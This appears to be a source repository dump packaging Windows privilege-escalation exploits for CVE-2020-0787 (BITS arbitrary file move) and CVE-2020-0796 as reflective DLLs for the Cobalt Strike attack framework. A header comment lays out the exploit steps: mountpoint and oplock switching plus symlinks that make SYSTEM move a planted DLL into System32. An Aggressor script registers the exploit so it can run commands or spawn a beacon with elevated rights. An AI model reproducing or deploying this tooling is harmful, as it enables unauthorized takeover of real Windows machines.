├── CVE-2020-0787_CNA ├── BitsArbitraryFileMove.cpp ├── BitsArbitraryFileMove │ ├── BitsArbitraryFileMove.cpp │ ├── BitsArbitraryFileMove.h │ ├── BitsArbitraryFileMove.vcxproj │ ├── BitsArbitraryFileMove.vcxproj.filters │ ├── BitsArbitraryFileMove.vcxproj.user │ ├── CBitsCom.cpp │ └── CBitsCom.h ├── CVE_2020_0787.cna ├── CobaltStrikeShow.gif ├── CommonUtils │ ├── CommonUtils.cpp │ ├── CommonUtils.h │ ├── CommonUtils.vcxproj │ ├── CommonUtils.vcxproj.filters │ ├── CommonUtils.vcxproj.user │ ├── DirectoryObject.cpp │ ├── FileOpLock.cpp │ ├── FileOpLock.h │ ├── FileSymlink.cpp │ ├── FileSymlink.h │ ├── Hardlink.cpp │ ├── NativeSymlink.cpp │ ├── RegistrySymlink.cpp │ ├── ReparsePoint.cpp │ ├── ReparsePoint.h │ ├── ScopedHandle.cpp │ ├── ScopedHandle.h │ ├── ntimports.h │ ├── stdafx.cpp │ ├── stdafx.h │ ├── targetver.h │ └── typed_buffer.h ├── README.md ├── reflective_dll.sln ├── reflective_dll.vcproj ├── reflective_dll.vcxproj ├── reflective_dll.vcxproj.filters ├── reflective_dll.vcxproj.user └── src │ ├── BitsArbitraryFileMove.h │ ├── ReflectiveDLLInjection.h │ ├── ReflectiveDll.cpp │ ├── ReflectiveLoader.cpp │ └── ReflectiveLoader.h ├── CVE-2020-0796_CNA ├── CVE_2020_0796_CNA_4.0.cna ├── CVE_2020_0796_CNA_4.2.cna ├── README.md ├── images │ └── RUN.gif ├── reflective_dll.sln ├── reflective_dll.vcproj ├── reflective_dll.vcxproj ├── reflective_dll.vcxproj.filters ├── reflective_dll.vcxproj.user ├── src │ ├── ReflectiveDLLInjection.h │ ├── ReflectiveDll.c │ ├── ReflectiveLoader.c │ ├── ReflectiveLoader.h │ └── exploit.h └── x64 │ └── Release │ └── reflective_dll.x64.dll ├── ExitService ├── ExitService.cpp ├── ExitService.filters ├── ExitService.sln ├── ExitService.user ├── ExitService.vcxproj └── ExitService.vcxproj.user ├── LICENSE ├── README.md └── Service_Reflective_dll ├── README.md ├── Release └── readme.md ├── bin └── readme.md ├── dll ├── Release │ └── readme.md ├── reflective_dll.sln ├── reflective_dll.vcproj ├── reflective_dll.vcxproj ├── reflective_dll.vcxproj.filters ├── reflective_dll.vcxproj.user └── src │ ├── ReflectiveDLLInjection.h │ ├── ReflectiveDll.c │ ├── ReflectiveLoader.c │ └── ReflectiveLoader.h └── rdi.sln /CVE-2020-0787_CNA/BitsArbitraryFileMove.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yanghaoi/ReflectiveDllSource/f554823e63146c5b3c9c64ab0f051964e3491697/CVE-2020-0787_CNA/BitsArbitraryFileMove.cpp -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/BitsArbitraryFileMove/BitsArbitraryFileMove.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yanghaoi/ReflectiveDllSource/f554823e63146c5b3c9c64ab0f051964e3491697/CVE-2020-0787_CNA/BitsArbitraryFileMove/BitsArbitraryFileMove.cpp -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/BitsArbitraryFileMove/BitsArbitraryFileMove.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | /* 4 | 0) Prepare workspace 5 | Create C:\workspace\ 6 | Create C:\workspace\mountpoint\ 7 | Create C:\workspace\bait\ 8 | Create C:\workspace\FakeDll.dll 9 | 10 | C:\workspace 11 | |__ mountpoint 12 | |__ redir 13 | |__ FakeDll.dll 14 | 15 | 1) Create a mountpoint 16 | C:\workspace\mountpoint\ -> C:\workspace\bait\ 17 | 18 | 2) Create the group / job / add file / etc. 19 | LocalFile = C:\workspace\mountpoint\test.txt 20 | 21 | At this point, a tmp file should have been created with user impersonation 22 | C:\workspace\bait\BITD857.tmp 23 | 24 | 3) Set an oplock on the tmp file 25 | C:\workspace\bait\BITD857.tmp 26 | 27 | 4) Resume the job 28 | The oplock will be triggered on the write operation as user 29 | 30 | 5) Switch the mountpoint and create symlinks 31 | C:\workspace\mountpoint\ -> \RPC Control 32 | \RPC Control\BITD857.tmp -> \??\C:\workspace\FakeDll.dll 33 | \RPC Control\test.txt -> \??\C:\Windows\System32\FakeDll.dll 34 | 35 | 6) Release the oplock 36 | The MoveFileW operation should be done as System 37 | */ 38 | #include 39 | #include 40 | #include 41 | 42 | #define DEBUG FALSE 43 | #define MAX_FILENAME 32 44 | #define MAX_MSG 1024 45 | 46 | class BitsArbitraryFileMove 47 | { 48 | private: 49 | BOOL m_bCustomSourceFile; 50 | WCHAR m_wszWorkspaceDirPath[MAX_PATH]; 51 | WCHAR m_wszMountpointDirPath[MAX_PATH]; 52 | WCHAR m_wszBaitDirPath[MAX_PATH]; 53 | WCHAR m_wszSourceFilePath[MAX_PATH]; 54 | WCHAR m_wszTargetFilePath[MAX_PATH]; 55 | WCHAR m_wszBitsLocalFileName[MAX_FILENAME]; 56 | WCHAR m_wszBitsTempFileName[MAX_FILENAME]; 57 | WCHAR m_wszBitsTempFilePath[MAX_PATH]; 58 | 59 | public: 60 | // Constructor / Destructor 61 | BitsArbitraryFileMove(); 62 | ~BitsArbitraryFileMove(); 63 | 64 | public: 65 | BOOL Run(LPCWSTR pwszDstFile); // e.g.: Destination="C:\Windows\System32\FakeDll.dll" 66 | 67 | BOOL Run(LPCWSTR pwszSrcFile, LPCWSTR pwszDstFile); // e.g.: Source="C:\Workspace\FakeDll.dll", Destination="C:\Windows\System32\FakeDll.dll" 68 | void PrintSuccess(LPCWSTR pwszMsg); 69 | 70 | private: 71 | BOOL PrepareWorkspace(); 72 | BOOL WriteSourceFile(); 73 | BOOL FindBitsTempFile(); 74 | BOOL TargetFileExists(); 75 | void CleanUp(); 76 | }; 77 | 78 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/BitsArbitraryFileMove/BitsArbitraryFileMove.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | ARM 7 | 8 | 9 | Debug 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | ARM 19 | 20 | 21 | Release 22 | Win32 23 | 24 | 25 | Release 26 | x64 27 | 28 | 29 | 30 | 16.0 31 | {36C758EB-8C26-4DD6-915E-7030275418A5} 32 | Win32Proj 33 | BitsArbitraryFileMove 34 | 10.0 35 | 36 | 37 | 38 | v142 39 | StaticLibrary 40 | Unicode 41 | true 42 | 43 | 44 | v142 45 | StaticLibrary 46 | Unicode 47 | true 48 | 49 | 50 | v142 51 | 52 | 53 | v142 54 | Unicode 55 | StaticLibrary 56 | true 57 | 58 | 59 | v142 60 | Unicode 61 | StaticLibrary 62 | true 63 | 64 | 65 | v142 66 | Unicode 67 | StaticLibrary 68 | true 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | .lib 78 | $(SolutionDir)$(Configuration)\$(Platform)\ 79 | $(Configuration)\$(Platform)\ 80 | 81 | 82 | .lib 83 | 84 | 85 | .lib 86 | 87 | 88 | $(SolutionDir)$(Configuration)\$(Platform)\ 89 | $(Configuration)\$(Platform)\ 90 | 91 | 92 | $(Configuration)\$(Platform)\ 93 | $(SolutionDir)$(Configuration)\$(Platform)\ 94 | 95 | 96 | 97 | MultiThreaded 98 | true 99 | Level3 100 | true 101 | ..\CommonUtils 102 | 103 | 104 | 105 | 106 | MultiThreaded 107 | true 108 | Level3 109 | true 110 | ..\CommonUtils 111 | 112 | 113 | 114 | 115 | MultiThreaded 116 | true 117 | Level3 118 | true 119 | ..\CommonUtils 120 | 121 | 122 | 123 | 124 | MultiThreadedDebug 125 | Level3 126 | 127 | 128 | 129 | 130 | MultiThreadedDebug 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | {2aa6ab5e-18a8-49f4-b25d-587e8c3e4432} 144 | 145 | 146 | 147 | 148 | 149 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/BitsArbitraryFileMove/BitsArbitraryFileMove.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Fichiers sources 20 | 21 | 22 | Fichiers sources 23 | 24 | 25 | 26 | 27 | Fichiers d%27en-tête 28 | 29 | 30 | Fichiers d%27en-tête 31 | 32 | 33 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/BitsArbitraryFileMove/BitsArbitraryFileMove.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/BitsArbitraryFileMove/CBitsCom.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yanghaoi/ReflectiveDllSource/f554823e63146c5b3c9c64ab0f051964e3491697/CVE-2020-0787_CNA/BitsArbitraryFileMove/CBitsCom.cpp -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/BitsArbitraryFileMove/CBitsCom.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | //#define BITSCOM_GUID_GROUP { 0x63B45B2D, 0xA84B, 0x463E, { 0x9C, 0xD4, 0xC0, 0x48, 0xC1, 0xBF, 0x9E, 0x72 } } 10 | #define BITSCOM_GUID_GROUP { 0x63B45B2D, 0xA84B, 0x463E, { 0x9C, 0xD4, 0xC0, 0x48, 0xC1, 0xBF, 0x9E, 0x71 } } 11 | #define MAX_JOBSTATE_NAME 64 12 | 13 | enum PrepareJobError 14 | { 15 | BITSCOM_ERR_SUCCESS, 16 | BITSCOM_ERR_COCREATEINSTANCE_BCQMGR, 17 | BITSCOM_ERR_CREATEGROUP, 18 | BITSCOM_ERR_GETGROUP, 19 | BITSCOM_ERR_CANCELGROUP, 20 | BITSCOM_ERR_CREATEJOB, 21 | BITSCOM_ERR_GETJOB, 22 | BITSCOM_ERR_RESUMEJOB, 23 | BITSCOM_ERR_JOB, 24 | BITSCOM_ERR_COMPLETEJOB, 25 | BITSCOM_ERR_ALLOC_FILESETINFO, 26 | BITSCOM_ERR_ALLOC_ADDFILES, 27 | BITSCOM_ERR_QUERYNEWJOBINTERFACE, 28 | BITSCOM_ERR_JOBINTERFACECAST, 29 | BITSCOM_ERR_NEWJOBINTERFACEISNULL 30 | }; 31 | 32 | class CBitsCom 33 | { 34 | private: 35 | GUID m_guidGroup; 36 | GUID m_guidJob; 37 | IBackgroundCopyQMgr* m_pBackgroundCopyQMgr; 38 | IBackgroundCopyGroup* m_pBackgroundCopyGroup; 39 | IBackgroundCopyJob1* m_pBackgroundCopyJob1; 40 | CComPtr m_pUnkNewJobInterface; 41 | 42 | public: 43 | CBitsCom(); 44 | ~CBitsCom(); 45 | 46 | public: 47 | DWORD PrepareJob(LPCWSTR pwszJobLocalFilename); 48 | DWORD ResumeJob(); 49 | DWORD CompleteJob(); 50 | 51 | private: 52 | BOOL GetJobStateName(BG_JOB_STATE bgJobState, LPWSTR pwszJobName); 53 | }; 54 | 55 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CVE_2020_0787.cna: -------------------------------------------------------------------------------- 1 | sub getnow { 2 | return (formatDate("yyyy/MM/dd HH:mm:ss")); 3 | } 4 | sub CVE_2020_0787 { 5 | $Dialog = dialog("CVE_2020_0787-Execute",%(program => "cmd.exe" , parameters => "/c whoami" , bid => $1 , listener => $2),lambda({ 6 | local('$program $parameters $Action $user $bid $arch $dll $cmdline'); 7 | $bid = $3['bid']; 8 | $program = $3['program']; 9 | $listener = $3['listener']; 10 | $parameters = $3['parameters']; 11 | $Action = $3['Action']; 12 | blog($bid, "-------".getnow()."-------"); 13 | if($Action eq "Execute"){ 14 | $cmdline = "1|".$program."|".$parameters. " \> \\\\\\\\.\\\\pipe\\\\8e8988b257e9dd2ea44ff03d44d26467b7c9ec16"; 15 | }else if($Action eq "Beacon"){ 16 | $cmdline = "2|".$program."|".$parameters; 17 | } 18 | 19 | $cmdline = replace($cmdline,":\/",":\/\/"); 20 | blog($bid, "Run: \c4 $cmdline \o"); 21 | btask($bid, "Task Beacon to run " . listener_describe($listener) . " via CVE-2020-0787"); #KB4551762 22 | 23 | if(binfo($bid, "arch") eq "x86"){ 24 | blog($bid,"Beacon Arch is x86"); 25 | $dll = getFileProper(script_resource("PrivilegeEscalation/ReflectionDLL/"), "CVE_2020_0787_x86.dll"); 26 | }else if (binfo($bid, "arch") eq "x64"){ 27 | blog($bid,"Beacon Arch is x64"); 28 | $dll = getFileProper(script_resource("PrivilegeEscalation/ReflectionDLL/"), "CVE_2020_0787_x64.dll"); 29 | }else{ 30 | berror($bid,"Not Found Arch!"); 31 | return; 32 | } 33 | bdllspawn!($bid, $dll,$cmdline, "Elevation of local privileges", 5000); 34 | },$1 => $1 )); 35 | dialog_description($Dialog, "WARNING! Must be readme before execution.
Action-Execute:Result for command
Action-Beacon:Return Beacon And No Result
-Inputing in Parameters:
--Eg: /c C://Users//A//AppData//Local//B.exe
--Eg: /c C:\\\\\\\\Users\\\\\\\\beacon.exe"); 36 | drow_text($Dialog, "program", "Program:"); 37 | drow_text($Dialog, "parameters", "Parameters:"); 38 | drow_combobox($Dialog, "Action", "Action: ", @("Execute","Beacon")); 39 | dbutton_action($Dialog, "Execute"); 40 | dialog_show($Dialog); 41 | } 42 | beacon_exploit_register("CVE_2020_0787", "CVE_2020_0787", &CVE_2020_0787); -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CobaltStrikeShow.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yanghaoi/ReflectiveDllSource/f554823e63146c5b3c9c64ab0f051964e3491697/CVE-2020-0787_CNA/CobaltStrikeShow.gif -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/CommonUtils.cpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Google Inc. All Rights Reserved. 2 | // 3 | // Licensed under the Apache License, Version 2.0 (the "License"); 4 | // you may not use this file except in compliance with the License. 5 | // You may obtain a copy of the License at 6 | // 7 | // http ://www.apache.org/licenses/LICENSE-2.0 8 | // 9 | // Unless required by applicable law or agreed to in writing, software 10 | // distributed under the License is distributed on an "AS IS" BASIS, 11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | // See the License for the specific language governing permissions and 13 | // limitations under the License. 14 | 15 | #include "stdafx.h" 16 | #include "CommonUtils.h" 17 | #include 18 | #include "ntimports.h" 19 | 20 | void __stdcall my_puts(const char* str) 21 | { 22 | fwrite(str, 1, strlen(str), stdout); 23 | } 24 | 25 | static console_output _pout = my_puts; 26 | 27 | void DebugSetOutput(console_output pout) 28 | { 29 | _pout = pout; 30 | } 31 | 32 | void DebugPrintf(const char* lpFormat, ...) 33 | { 34 | CHAR buf[1024]; 35 | va_list va; 36 | 37 | va_start(va, lpFormat); 38 | 39 | StringCbVPrintfA(buf, sizeof(buf), lpFormat, va); 40 | 41 | _pout(buf); 42 | } 43 | 44 | std::wstring GetErrorMessage(DWORD dwError) 45 | { 46 | LPWSTR pBuffer = NULL; 47 | 48 | DWORD dwSize = FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS | 49 | FORMAT_MESSAGE_ALLOCATE_BUFFER, 0, dwError, 0, (LPWSTR)&pBuffer, 32 * 1024, nullptr); 50 | 51 | if (dwSize > 0) 52 | { 53 | std::wstring ret = pBuffer; 54 | 55 | LocalFree(pBuffer); 56 | 57 | return ret; 58 | } 59 | else 60 | { 61 | printf("Error getting message %d\n", GetLastError()); 62 | WCHAR buf[64]; 63 | StringCchPrintf(buf, _countof(buf), L"%d", dwError); 64 | return buf; 65 | } 66 | } 67 | 68 | std::wstring GetErrorMessage() 69 | { 70 | return GetErrorMessage(GetLastError()); 71 | } 72 | 73 | 74 | BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege) 75 | { 76 | TOKEN_PRIVILEGES tp; 77 | LUID luid; 78 | 79 | if (!LookupPrivilegeValue(NULL, lpszPrivilege, &luid)) 80 | { 81 | return FALSE; 82 | } 83 | 84 | tp.PrivilegeCount = 1; 85 | tp.Privileges[0].Luid = luid; 86 | if (bEnablePrivilege) 87 | { 88 | tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 89 | } 90 | else 91 | { 92 | tp.Privileges[0].Attributes = 0; 93 | } 94 | 95 | if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL)) 96 | { 97 | return FALSE; 98 | } 99 | 100 | if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) 101 | { 102 | return FALSE; 103 | } 104 | 105 | return TRUE; 106 | } 107 | 108 | DWORD NtStatusToDosError(NTSTATUS status) 109 | { 110 | DEFINE_NTDLL(RtlNtStatusToDosError); 111 | return fRtlNtStatusToDosError(status); 112 | } 113 | 114 | void SetNtLastError(NTSTATUS status) 115 | { 116 | SetLastError(NtStatusToDosError(status)); 117 | } 118 | 119 | FARPROC GetProcAddressNT(LPCSTR lpName) 120 | { 121 | return GetProcAddress(GetModuleHandleW(L"ntdll"), lpName); 122 | } 123 | 124 | HANDLE OpenFileNative(LPCWSTR path, HANDLE root, ACCESS_MASK desired_access, ULONG share_access, ULONG open_options) 125 | { 126 | UNICODE_STRING name = { 0 }; 127 | OBJECT_ATTRIBUTES obj_attr = { 0 }; 128 | 129 | DEFINE_NTDLL(RtlInitUnicodeString); 130 | DEFINE_NTDLL(NtOpenFile); 131 | 132 | if (path) 133 | { 134 | fRtlInitUnicodeString(&name, path); 135 | InitializeObjectAttributes(&obj_attr, &name, OBJ_CASE_INSENSITIVE, root, nullptr); 136 | } 137 | else 138 | { 139 | InitializeObjectAttributes(&obj_attr, nullptr, OBJ_CASE_INSENSITIVE, root, nullptr); 140 | } 141 | 142 | HANDLE h = nullptr; 143 | IO_STATUS_BLOCK io_status = { 0 }; 144 | NTSTATUS status = fNtOpenFile(&h, desired_access, &obj_attr, &io_status, share_access, open_options); 145 | if (NT_SUCCESS(status)) 146 | { 147 | return h; 148 | } 149 | else 150 | { 151 | SetNtLastError(status); 152 | return nullptr; 153 | } 154 | } 155 | 156 | std::wstring BuildFullPath(const std::wstring& path, bool native) 157 | { 158 | std::wstring ret; 159 | WCHAR buf[MAX_PATH]; 160 | 161 | if (native) 162 | { 163 | ret = L"\\??\\"; 164 | } 165 | 166 | if (GetFullPathName(path.c_str(), MAX_PATH, buf, nullptr) > 0) 167 | { 168 | ret += buf; 169 | } 170 | else 171 | { 172 | ret += path; 173 | } 174 | 175 | return ret; 176 | } -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/CommonUtils.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | typedef void(__stdcall *console_output)(const char*); 7 | 8 | void DebugSetOutput(console_output pout); 9 | void DebugPrintf(const char* lpFormat, ...); 10 | HANDLE CreateSymlink(HANDLE root, LPCWSTR linkname, LPCWSTR targetname); 11 | HANDLE OpenSymlink(HANDLE root, LPCWSTR linkname); 12 | HANDLE CreateObjectDirectory(HANDLE hRoot, LPCWSTR dirname, HANDLE hShadow); 13 | HANDLE OpenObjectDirectory(HANDLE hRoot, LPCWSTR dirname); 14 | std::wstring GetErrorMessage(DWORD dwError); 15 | std::wstring GetErrorMessage(); 16 | BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege); 17 | bool CreateRegSymlink(LPCWSTR lpSymlink, LPCWSTR lpTarget, bool bVolatile); 18 | bool DeleteRegSymlink(LPCWSTR lpSymlink); 19 | DWORD NtStatusToDosError(NTSTATUS status); 20 | bool CreateNativeHardlink(LPCWSTR linkname, LPCWSTR targetname); 21 | HANDLE OpenFileNative(LPCWSTR path, HANDLE root, ACCESS_MASK desired_access, ULONG share_access, ULONG open_options); 22 | std::wstring BuildFullPath(const std::wstring& path, bool native); -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/CommonUtils.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | ARM 7 | 8 | 9 | Debug 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | ARM 19 | 20 | 21 | Release 22 | Win32 23 | 24 | 25 | Release 26 | x64 27 | 28 | 29 | 30 | {2AA6AB5E-18A8-49F4-B25D-587E8C3E4432} 31 | Win32Proj 32 | CommonUtils 33 | 10.0.18362.0 34 | 35 | 36 | 37 | v142 38 | StaticLibrary 39 | Unicode 40 | true 41 | 42 | 43 | v142 44 | StaticLibrary 45 | Unicode 46 | true 47 | 48 | 49 | v142 50 | 51 | 52 | v142 53 | Unicode 54 | true 55 | StaticLibrary 56 | 57 | 58 | v142 59 | Unicode 60 | true 61 | StaticLibrary 62 | 63 | 64 | v142 65 | Unicode 66 | true 67 | StaticLibrary 68 | 69 | 70 | 71 | 72 | 73 | 74 | .lib 75 | $(SolutionDir)$(Configuration)\$(Platform)\ 76 | $(Configuration)\$(Platform)\ 77 | 78 | 79 | .lib 80 | $(Configuration)\$(Platform)\ 81 | $(SolutionDir)$(Configuration)\$(Platform)\ 82 | 83 | 84 | .lib 85 | 86 | 87 | $(Configuration)\$(Platform)\ 88 | $(SolutionDir)$(Configuration)\$(Platform)\ 89 | 90 | 91 | $(SolutionDir)$(Configuration)\$(Platform)\ 92 | $(Configuration)\$(Platform)\ 93 | 94 | 95 | 96 | Level3 97 | 98 | 99 | 100 | 101 | Level3 102 | 103 | 104 | 105 | 106 | Level3 107 | 108 | 109 | 110 | 111 | true 112 | MultiThreaded 113 | true 114 | 115 | 116 | 117 | 118 | true 119 | MultiThreaded 120 | true 121 | 122 | 123 | 124 | 125 | true 126 | MultiThreaded 127 | true 128 | 129 | 130 | 131 | 132 | Level3 133 | 134 | 135 | 136 | 137 | true 138 | MultiThreadedDebug 139 | 140 | 141 | 142 | 143 | MultiThreadedDebug 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/CommonUtils.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | Header Files 29 | 30 | 31 | Header Files 32 | 33 | 34 | Header Files 35 | 36 | 37 | Header Files 38 | 39 | 40 | Header Files 41 | 42 | 43 | Header Files 44 | 45 | 46 | 47 | 48 | Source Files 49 | 50 | 51 | Source Files 52 | 53 | 54 | Source Files 55 | 56 | 57 | Source Files 58 | 59 | 60 | Source Files 61 | 62 | 63 | Source Files 64 | 65 | 66 | Source Files 67 | 68 | 69 | Source Files 70 | 71 | 72 | Source Files 73 | 74 | 75 | Source Files 76 | 77 | 78 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/CommonUtils.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/DirectoryObject.cpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Google Inc. All Rights Reserved. 2 | // 3 | // Licensed under the Apache License, Version 2.0 (the "License"); 4 | // you may not use this file except in compliance with the License. 5 | // You may obtain a copy of the License at 6 | // 7 | // http ://www.apache.org/licenses/LICENSE-2.0 8 | // 9 | // Unless required by applicable law or agreed to in writing, software 10 | // distributed under the License is distributed on an "AS IS" BASIS, 11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | // See the License for the specific language governing permissions and 13 | // limitations under the License. 14 | 15 | #include "stdafx.h" 16 | #include "CommonUtils.h" 17 | #include "ntimports.h" 18 | 19 | HANDLE CreateObjectDirectory(HANDLE hRoot, LPCWSTR dirname, HANDLE hShadow) 20 | { 21 | DEFINE_NTDLL(RtlInitUnicodeString); 22 | DEFINE_NTDLL(NtCreateDirectoryObjectEx); 23 | 24 | OBJECT_ATTRIBUTES obj_attr; 25 | UNICODE_STRING obj_name; 26 | 27 | if (dirname) 28 | { 29 | fRtlInitUnicodeString(&obj_name, dirname); 30 | InitializeObjectAttributes(&obj_attr, &obj_name, OBJ_CASE_INSENSITIVE, hRoot, nullptr); 31 | } 32 | else 33 | { 34 | InitializeObjectAttributes(&obj_attr, nullptr, OBJ_CASE_INSENSITIVE, hRoot, nullptr); 35 | } 36 | 37 | HANDLE h = nullptr; 38 | NTSTATUS status = fNtCreateDirectoryObjectEx(&h, DIRECTORY_ALL_ACCESS, &obj_attr, hShadow, FALSE); 39 | if (status == 0) 40 | { 41 | return h; 42 | } 43 | else 44 | { 45 | SetLastError(NtStatusToDosError(status)); 46 | return nullptr; 47 | } 48 | } 49 | 50 | HANDLE OpenObjectDirectory(HANDLE hRoot, LPCWSTR dirname) 51 | { 52 | DEFINE_NTDLL(RtlInitUnicodeString); 53 | DEFINE_NTDLL(NtOpenDirectoryObject); 54 | 55 | OBJECT_ATTRIBUTES obj_attr; 56 | UNICODE_STRING obj_name; 57 | 58 | fRtlInitUnicodeString(&obj_name, dirname); 59 | 60 | InitializeObjectAttributes(&obj_attr, &obj_name, OBJ_CASE_INSENSITIVE, hRoot, nullptr); 61 | 62 | HANDLE h = nullptr; 63 | 64 | NTSTATUS status = fNtOpenDirectoryObject(&h, MAXIMUM_ALLOWED, &obj_attr); 65 | if (status == 0) 66 | { 67 | return h; 68 | } 69 | else 70 | { 71 | SetLastError(NtStatusToDosError(status)); 72 | return nullptr; 73 | } 74 | } -------------------------------------------------------------------------------- /CVE-2020-0787_CNA/CommonUtils/FileOpLock.cpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Google Inc. All Rights Reserved. 2 | // 3 | // Licensed under the Apache License, Version 2.0 (the "License"); 4 | // you may not use this file except in compliance with the License. 5 | // You may obtain a copy of the License at 6 | // 7 | // http ://www.apache.org/licenses/LICENSE-2.0 8 | // 9 | // Unless required by applicable law or agreed to in writing, software 10 | // distributed under the License is distributed on an "AS IS" BASIS, 11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | // See the License for the specific language governing permissions and 13 | // limitations under the License. 14 | 15 | #include "stdafx.h" 16 | #include "FileOpLock.h" 17 | #include 18 | 19 | void DebugPrintf(LPCSTR lpFormat, ...); 20 | 21 | FileOpLock::FileOpLock(UserCallback cb): 22 | g_inputBuffer({ 0 }), g_outputBuffer({ 0 }), g_o({ 0 }), g_hFile(INVALID_HANDLE_VALUE), g_hLockCompleted(nullptr), g_wait(nullptr), _cb(cb) 23 | { 24 | g_inputBuffer.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION; 25 | g_inputBuffer.StructureLength = sizeof(g_inputBuffer); 26 | g_inputBuffer.RequestedOplockLevel = OPLOCK_LEVEL_CACHE_READ | OPLOCK_LEVEL_CACHE_HANDLE; 27 | g_inputBuffer.Flags = REQUEST_OPLOCK_INPUT_FLAG_REQUEST; 28 | g_outputBuffer.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION; 29 | g_outputBuffer.StructureLength = sizeof(g_outputBuffer); 30 | } 31 | 32 | 33 | FileOpLock::~FileOpLock() 34 | { 35 | if (g_wait) 36 | { 37 | SetThreadpoolWait(g_wait, nullptr, nullptr); 38 | CloseThreadpoolWait(g_wait); 39 | g_wait = nullptr; 40 | } 41 | 42 | if (g_o.hEvent) 43 | { 44 | CloseHandle(g_o.hEvent); 45 | g_o.hEvent = nullptr; 46 | } 47 | 48 | if (g_hFile != INVALID_HANDLE_VALUE) 49 | { 50 | CloseHandle(g_hFile); 51 | g_hFile = INVALID_HANDLE_VALUE; 52 | } 53 | } 54 | 55 | bool FileOpLock::BeginLock(const std::wstring& filename, DWORD dwShareMode, bool exclusive) 56 | { 57 | g_hLockCompleted = CreateEvent(nullptr, TRUE, FALSE, nullptr); 58 | g_o.hEvent = CreateEvent(nullptr, FALSE, FALSE, nullptr); 59 | 60 | DWORD flags = FILE_FLAG_OVERLAPPED; 61 | 62 | if (GetFileAttributesW(filename.c_str()) & FILE_ATTRIBUTE_DIRECTORY) 63 | { 64 | flags |= FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT; 65 | } 66 | 67 | g_hFile = CreateFileW(filename.c_str(), GENERIC_READ, 68 | 